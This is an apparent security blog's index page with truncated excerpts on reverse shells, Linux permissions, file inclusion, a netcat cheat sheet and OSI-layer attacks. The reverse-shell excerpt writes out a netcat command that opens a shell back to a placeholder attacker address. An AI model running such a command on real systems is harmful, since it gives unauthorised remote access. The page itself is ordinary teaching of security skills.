RatSec Blog

Reverse Shell Methods

- Posted in Uncategorized by

Using Netcat Netcat Simple Shell: On the attacker's machine: nc -lvp 4444 On the target machine: nc <attacker_IP> 4444 -e /bin/bash Netcat with mkfifo: On the attacker's machine: nc -lvp 4444
In today's rapidly evolving digital landscape, the role of ethical hackers has become more critical than ever. As cyber threats continue to grow in complexity and frequency, ethical hackers are

Linux File Permissions

- Posted in Uncategorized by

In Linux, each file and directory has an associated set of permissions and ownership attributes that determine who can access and manipulate the files and directories. These permissions are defined
These ports represent common entry points and services used across the internet. The vulnerabilities associated with these ports can stem from outdated software, poor configurations, weak passwords,

File Inclusion

- Posted in Bug bounties by

Introduction Define LFI and RFI: LFI (Local File Inclusion): A vulnerability that allows attackers to include files from the local server. RFI (Remote File Inclusion): A vulnerability that allows

Netcat Cheat Sheet

- Posted in Uncategorized by

1. Listening Mode: nc -l -p <port> Start Netcat in listening mode on a specific port. This mode waits for incoming connections. Connect Mode: nc <host> <port> Connect to a specific
Vulnerability Scanning Packet Sniffing Man-in-the-Middle Attacks (MitM) DNS Spoofing ARP Spoofing SSL/TLS Hijacking Session Hijacking IP Spoofing MAC Address Spoofing SMTP Relay Exploits Firewall

osi attacks

- Posted in Uncategorized by

Application Layer Functions Attack Vectors User interface & applevel service malware injection Web browsing, email, file transfer Phishing attacks HTTP, SMTP, DNS protocols App-level DDoS attacks